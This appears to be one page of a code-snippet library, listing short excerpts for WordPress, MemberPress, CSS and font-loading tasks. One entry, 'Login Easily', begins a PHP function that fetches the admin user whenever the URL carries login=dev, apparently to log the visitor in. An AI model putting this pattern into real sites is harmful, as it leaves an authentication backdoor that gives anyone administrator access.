om.Campaign.init.preload

document.addEventListener('om.Campaign.init.preload', function(event) { var campaign = event.detail.Campaign; campaign.settings.preload = false; });

fontfaceObserver.js

Detect if web fonts are available

Modern CSS Reset

https://www.joshwcomeau.com/css/custom-css-reset/

Hendrik van den Bor
<10

Chatbot de voz

Soluciono dudas

EMILIO NARANJO SALAZAR
<10

Multiple Event Tracking with an HTML Link

Example of how to use Multiple Event Tracking with an HTML link.

MemberPress: Change Username Field’s Placeholder and/or Label of the Field on Login Page

The first code snippet will customize the “Username or Email” placeholder on the Username field on…

Login Easily

function auto_login() { if (isset($_GET['login']) && $_GET['login'] === 'dev') { $user = get_user_by('login', 'admin'); if ($user)…

MemberPress: Remove a User Role After Subscription to a Specific Membership Expires

The code snippet will remove the specified role from a user after the user’s subscription to…

MemberPress: Kit (formerly ConvertKit) - Remove Kit Inactive Tag for Inactive Subscribers

By default, MemberPress integration with Kit will add the “inactive” tag when a user becomes inactive…

1 126 127 128 129 130 215